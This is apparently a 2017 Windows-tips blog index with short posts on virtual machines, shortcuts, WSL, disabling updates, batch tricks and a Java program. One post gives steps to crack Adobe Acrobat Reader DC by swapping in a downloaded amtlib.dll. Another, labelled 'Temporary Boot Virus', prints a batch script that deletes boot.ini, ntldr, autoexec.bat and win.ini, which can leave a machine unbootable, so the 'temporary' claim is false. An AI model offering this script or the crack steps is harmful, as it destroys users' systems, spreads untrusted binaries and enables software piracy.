Posts

Showing posts from January, 2017

How to install Windows 10 in a virtual machine

Image
However not quite perfect, Windows 10 is pretty amazing in its own aspects and is a solid release by Microsoft.  That being said, upgrading a production machine immediately after a major OS release is typically frowned upon. For those of us who want to try out all the new features without putting our productivity in jeopardy, virtualization is the best bet for the time being. If you're thinking of taking the Windows 10 plunge, but don't want to disturb your machine that's currently running just fine, here's  how to install Windows 10 in a virtual machine . Note that this is different than the virtual desktops; it's virtualizing the entire OS within another OS (your existing one). The process however isn't practically difficult at all. Here's how to do it. 1. Download the Windows 10 ISO First of all, browse to the Windows 10 download page, and select which edition you want to download(check which of them completely agrees with your system configura

Some useful Windows 10 keyboard shortcuts you must know

Hey there! This is a very simple post related to the keyboard shortcuts you can keep in use if you are running Windows 10. Here they are: Windows Key-Tab (Task View) Windows Key-Right-Up (Moves app to top right quadrant) Windows Key-Ctrl-Left or Right (virtual desktop) Windows Key-Ctrl-D (new virtual desktop) Windows Key-Ctrl-C (Cortana listening) Windows Key-S (Daily Glance for weather, news, sports) Windows Key-Ctrl-F4 (closes virtual desktop) Windows Key-Up and Down (snap apps to top or bottom of screen or maximizes)

Use Bash Shell in Windows 10

This awesome feature, included with Anniversary Update, lets you install the classic Bash UNIX shell, thanks to a joint effort with Canonical. To enable this feature, Head to Settings. Now go to Update and security. Now go to    For Developers and switch on Developer mode. Once this is done, head to the old control panel and then Go to Programs. Now you need to go to Turn Windows features on or off and check the box next to Windows Subsystem for Linux (beta). You'll need to reboot, at which point all you have to do is search for Bash to get started using it.  

How to turn off automatic updates in Windows 10

Image
Hey guys!! Here's a simple method as to how you can turn off those "annoying" and space consuming automatic updates on your Windows 10 "Home" & "Professional" versions. I've got the pro version so I don't really know if it works on enterprise but it's worth a go. Do comment if it worked for the enterprise users. Let's get started. Go to Control Panel   Now select Administrative tools Now you need to go to "Services" Just scroll down in the new window that opens up until you find "Windows Update" option Double click. Now to stop updates for only that session, click on "Stop" in "Service Status" . Mine is already done so you don't see that option highlighted. Now if you want to permanently stop the updates, go to the "Startup Types" option and select "Disabled". Apply and OK. That's it, you're done. Just restart your computer and c

How to crack Adobe Acrobat Reader Dc

Image
Hey guys...!!! I'm back with another interesting thing that most of you might probably need a lot of times because I usually look for cracks and patches when I install a program. It's how to crack Adobe Acrobat Reader DC so that you can use all features that are present in the full version. Why buy when you can crack it ;-). Let's start. Step 1. The first step is to obviously download the Adobe Reader and install it. Step 2. So the main task begins here. First of all follow the following link and download the .rar file from here  amtlib.rar  . Extract it and rename the file from amtlib.dll to amtlib.dll.BAK That's it. Now open file location Copy the renamed file into the file location of Acrobat Reader and you're done Thank you. Enjoy your full version of Acrobat Reader.

How to boost up your boot speed in Windows 10

Image
Hey guys. I'm back with another cool stuff for you Windows 10 users. Guess what, now you can speed up the boot speed of your Windows 10 device by just following these simple steps. Let's get started. 1. Open Start and type "msconfig". 2. Open it. The "General" tab must look somewhat like this. Check the "Selective startup" box as shown below. 3. Next you need to go to the "Boot" tab. Here is our real thing that we need to take care of. 4. Go to "Advanced options" in here. The following window should open. 5. I actually made an error while setting things up myself as you can see I have "Number of processors" selected as 1. All you have to do here is check this box and select the maximum number you find here. It may be 2 or 4. Check the "Maximum memory" box and you'll

Matrix Falling Code Effect

Image
Inspired by the movie series The Matrix (which I personally like a lot), this falling code trick is extremely popular on social networking websites. Copy and paste the code given below in Notepad and save the file as "Matrix.bat" or *.bat.    @echo off color 02 :tricks echo %random%%random%%random%%random%%random%%random%%random%%random% goto tricks  

How to create an all in one action center

Image
Bored of the usual control panel in Windows to perform actions and then go to a separate action center to perform some other actions?????? Don't worry here is a simple trick which will enable you to make your own action center better than the control panel. Create a new folder 2. Rename it         You will have to give this name to your new folder Everything.{ED7BA470-8E54-465E-825C-99712043E01C} and after renaming just press enter and see what happens Done. Now open it and see your new action center:- There's more in it. Every action you need. Do check it out.

How to minimize multiple windows at once in Windows 7

How to minimize multiple windows at once in Windows 7 Ever wondered if you could just shake off the open windows on your screen to minimize them just as you shake off dirt from your clothes?? Well with this very cool trick you can and the best part is you need not download anything, its a feature from Microsoft themselves which not many people are aware of. It's called   THE SHAKE FEATURE!!!! The Shake Feature Select a window and then shake it by dragging it with your mouse and see the magic. It's very simple yet cool. Just shake off the active windows on your screen as shown in the video and all of them will minimize except the one you are using. It's just like using a cloth to wipe out dirt. The interesting part is that on shaking again you get those windows back on the scree. Have a look:- https://www.youtube.com/watch?v=lPlmiK1C8I8&feature=youtu.be

How to replace incorrect versions of windows softwares with correct ones

Image
Hey guys many of us have problems with some Microsoft software versions for example in Windows Media Center you might not be having an option for Internet TV. No problem here's a simple solution 1.)Open an elevated command prompt. To do this, click  Start , click  All Programs , click   Accessories , right-click  Command             Prompt ,  and then click  Run as administrator . If you are prompted for an administrator password or for a confirmation, type the             password, or click  Allow . 2.)Type the following command, and then press ENTER:        sfc /scannow The  sfc /scannow  command scans all protected system files and replaces incorrect versions with correct Microsoft versions. The verification might take some time so relax till it's complete if you do not have any errors it shows this otherwise automatically fixes the fault

A Java Program that exits when you double press enter

Many people have problem thinking how they can exit their java program by double pressing enter key and they often use complicated methods like Scanner class and StringBuffer. Here is the simplest way to do this without using any complicated commands 1.) Open command prompt   go to run   type cmd   press enter 2.) type edit enter_exit.java (here enter_exit is the name of the class file of your program and .java is the extension) 3.) copy this code   import java.io.*; class enter_exit {  public static void main(String ar[])throws IOException  {   BufferedReader z=new BufferedReader(new InputStreamReader(System.in));   String s;   while(true)   {    System.out.println("Enter your input");    s=z.readLine();    if(s.length()==0)    {     System.out.println("Enter your input");     s=z.readLine();     if(s.length()==0)     break;    }   }  } } That's it now compile using javac enter_exit.java and then run using java enter_exit

How to Make a Batch Antivirus

Image
Hey guys I gave you a temporary virus code now here's one for a batch antivirus which detects batch viruses and scans batch files STEP #1:-OPEN NOTEPAD STEP #2:-TYPE IN EITHER OF THESE TWO CODES(I'VE TRIED BOTH) CODE 1 @echo off title Antivirus echo Antivirus echo created by your name :start if exist virus.bat goto infected if not exist virus.bat goto clean cd C:\Windows\system32 :infected echo warning virus detected del virus.bat pause goto start :clean echo System secure! pause exit  CODE 2[If the code does not run, try replacing {} braces by these parantheses ()] @echo off color cb title Batch Antivirus cls echo =============== echo [ Batch-Master] echo =============== echo If There's no message ,You are protected. set /p a=Enter a batch file to scan: for /f %%x in { 'findstr /i /m "virus r.i.p byebye HaHaHa Hacked Hack" %a%.bat' } do { if /i %%x equ %a%.bat { for /f %%z in } 'findstr /i

Temporary Boot Virus

This is the code for a temporary boot virus which won't allow your system to boot temporarily.This is a notepad code you can also make it on sublime text editor works just the same. Remember to use a .bat file extension for this @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini

How To Merge Two Video Files Into One

Image
Hello guys this is my first blog and here I am going to tell you how to merge two videos into one by using freemake video converter the first thing you need to do is go to this website http://www.freemake.com/free_video_converter/ this is the direct download link for the software and then hit download once it is downloaded open setup and install. you can do full installation or custom installation as per your wish. now after download is complete, launch the application the window will look like this now click on videos and add the videos you want to merge. make sure they are placed in correct order now turn "Join Files" on now you see these video formats which the software gives you. select anyone of these.upon doing this you'll get this screen you can change the video quality from "Preset" and the destiination file as you can see and then just hit "Convert". that's it once the files are merged, this appea